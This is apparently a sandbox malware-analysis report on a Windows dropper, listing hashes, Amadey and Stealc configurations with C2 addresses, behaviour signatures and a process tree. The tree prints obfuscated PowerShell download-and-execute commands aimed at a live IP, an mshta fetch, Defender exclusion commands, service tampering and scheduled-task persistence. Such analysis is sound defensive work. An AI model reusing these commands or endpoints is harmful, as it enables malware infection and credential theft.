Analysis

  • max time kernel
    82s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 19:23

General

  • Target

    1NALX_file.exe

  • Size

    1.8MB

  • MD5

    873f4ff6922f79aca237323377183153

  • SHA1

    c0e782ab9058afb71626fae94fdd996cbeda934a

  • SHA256

    bafd70cdb59a7b667840982897d95dcbb9fcf86bde1267aacc5f7b8dcdba0271

  • SHA512

    7fa1c35440711d5f2ac374678ba37b485e73e9e592ea1592268db5420b35c374595b79050ced86cbed22ffe9bfb94a5799527a0e375db37f2a186c911f1c10e8

  • SSDEEP

    49152:Kpe2Nf+D/CmuxmmCTHmn0sPx6rvwEyw1lkpR4Yk4Pbdt50O:R21ya98mYUPoroVslWuLebdb

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language
hta
Source
URLs
hta.dropper

http://176.113.115.178/Windows-Update

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/FF/1.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

mars

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 10 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Loads dropped DLL
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:596
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1376
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
                PID:328
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks processor information in registry
                PID:2264
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:676
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Indicator Removal: Clear Windows Event Logs
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:816
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1152
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in Windows directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:852
                    • C:\Windows\system32\wbem\WMIADAP.EXE
                      wmiadap.exe /F /T /R
                      3⤵
                        PID:1036
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {CDE7E53B-20FD-4A1D-83C6-70629D535A64} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
                        3⤵
                          PID:2856
                          • C:\Users\Admin\AppData\Local\Temp\service123.exe
                            C:\Users\Admin\AppData\Local\Temp\/service123.exe
                            4⤵
                              PID:784
                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                              C:\Users\Admin\AppData\Local\Temp\/service123.exe
                              4⤵
                                PID:860
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService
                            2⤵
                              PID:968
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k NetworkService
                              2⤵
                                PID:268
                              • C:\Windows\System32\spoolsv.exe
                                C:\Windows\System32\spoolsv.exe
                                2⤵
                                  PID:340
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                  2⤵
                                    PID:1068
                                  • C:\Windows\system32\taskhost.exe
                                    "taskhost.exe"
                                    2⤵
                                      PID:1104
                                    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                      2⤵
                                        PID:1616
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                        2⤵
                                          PID:1012
                                        • C:\Windows\system32\sppsvc.exe
                                          C:\Windows\system32\sppsvc.exe
                                          2⤵
                                            PID:2036
                                          • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                            "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                            2⤵
                                              PID:2416
                                            • C:\ProgramData\Mig\Mig.exe
                                              C:\ProgramData\Mig\Mig.exe
                                              2⤵
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              PID:4440
                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                3⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4632
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                3⤵
                                                  PID:4792
                                                  • C:\Windows\system32\wusa.exe
                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                    4⤵
                                                    • Drops file in Windows directory
                                                    PID:4892
                                                • C:\Windows\system32\sc.exe
                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:4800
                                                • C:\Windows\system32\sc.exe
                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:5060
                                                • C:\Windows\system32\sc.exe
                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:5104
                                                • C:\Windows\system32\sc.exe
                                                  C:\Windows\system32\sc.exe stop bits
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:4016
                                                • C:\Windows\system32\sc.exe
                                                  C:\Windows\system32\sc.exe stop dosvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:4124
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1976
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2548
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3008
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3788
                                                • C:\Windows\system32\dialer.exe
                                                  C:\Windows\system32\dialer.exe
                                                  3⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2696
                                                • C:\Windows\system32\dialer.exe
                                                  C:\Windows\system32\dialer.exe
                                                  3⤵
                                                    PID:3688
                                                  • C:\Windows\system32\dialer.exe
                                                    dialer.exe
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3852
                                              • C:\Windows\system32\lsass.exe
                                                C:\Windows\system32\lsass.exe
                                                1⤵
                                                  PID:488
                                                • C:\Windows\system32\lsm.exe
                                                  C:\Windows\system32\lsm.exe
                                                  1⤵
                                                    PID:496
                                                  • C:\Windows\Explorer.EXE
                                                    C:\Windows\Explorer.EXE
                                                    1⤵
                                                      PID:1188
                                                      • C:\Users\Admin\AppData\Local\Temp\1NALX_file.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1NALX_file.exe"
                                                        2⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Identifies Wine through registry keys
                                                        • Loads dropped DLL
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Drops file in Windows directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2168
                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                          3⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Loads dropped DLL
                                                          • Adds Run key to start application
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2844
                                                          • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"
                                                            4⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Modifies system certificate store
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1644
                                                          • C:\Users\Admin\AppData\Local\Temp\1007999001\6592c74c9e.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1007999001\6592c74c9e.exe"
                                                            4⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:1432
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                              5⤵
                                                              • Uses browser remote debugging
                                                              • Enumerates system info in registry
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:1848
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5629758,0x7fef5629768,0x7fef5629778
                                                                6⤵
                                                                  PID:1096
                                                                • C:\Windows\system32\ctfmon.exe
                                                                  ctfmon.exe
                                                                  6⤵
                                                                    PID:836
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1072 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:2
                                                                    6⤵
                                                                      PID:2292
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:8
                                                                      6⤵
                                                                        PID:1540
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:8
                                                                        6⤵
                                                                          PID:2720
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:1
                                                                          6⤵
                                                                          • Uses browser remote debugging
                                                                          PID:2808
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:1
                                                                          6⤵
                                                                          • Uses browser remote debugging
                                                                          PID:2700
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1568 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:2
                                                                          6⤵
                                                                            PID:3572
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1308 --field-trial-handle=1464,i,6760367949152941285,3874623070944993765,131072 /prefetch:1
                                                                            6⤵
                                                                            • Uses browser remote debugging
                                                                            PID:3836
                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                                                          5⤵
                                                                            PID:4964
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                            5⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:4816
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 940
                                                                            5⤵
                                                                            • Program crash
                                                                            PID:3968
                                                                        • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:748
                                                                          • C:\Windows\system32\wscript.exe
                                                                            "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
                                                                            5⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:1088
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                              6⤵
                                                                              • Blocklisted process makes network request
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:292
                                                                              • C:\Windows\System32\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
                                                                                7⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1576
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
                                                                                  8⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2660
                                                                                  • C:\Windows\system32\mshta.exe
                                                                                    mshta http://176.113.115.178/Windows-Update
                                                                                    9⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2776
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                      10⤵
                                                                                      • UAC bypass
                                                                                      • Blocklisted process makes network request
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2044
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                                                        11⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1684
                                                                                      • C:\Users\Admin\AppData\Roaming\LB31.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\LB31.exe"
                                                                                        11⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in System32 directory
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2384
                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                          12⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2908
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                          12⤵
                                                                                            PID:1788
                                                                                            • C:\Windows\system32\wusa.exe
                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                              13⤵
                                                                                              • Drops file in Windows directory
                                                                                              PID:2760
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1576
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2800
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1280
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1544
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3576
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                            12⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3688
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                            12⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3684
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                            12⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1540
                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                            12⤵
                                                                                            • Power Settings
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1684
                                                                                          • C:\Windows\system32\dialer.exe
                                                                                            C:\Windows\system32\dialer.exe
                                                                                            12⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3380
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe delete "LIB"
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3336
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3764
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop eventlog
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4304
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe start "LIB"
                                                                                            12⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4312
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                6⤵
                                                                                • Blocklisted process makes network request
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1696
                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                  "C:\Windows\system32\ipconfig.exe" /flushdns
                                                                                  7⤵
                                                                                  • Gathers network information
                                                                                  PID:1712
                                                                          • C:\Users\Admin\AppData\Local\Temp\1008006001\b1c07bab38.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1008006001\b1c07bab38.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies system certificate store
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2564
                                                                          • C:\Users\Admin\AppData\Local\Temp\1008007001\2c7bb0b2a1.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\1008007001\2c7bb0b2a1.exe"
                                                                            4⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2108
                                                                          • C:\Users\Admin\AppData\Local\Temp\1008008001\83fb310255.exe
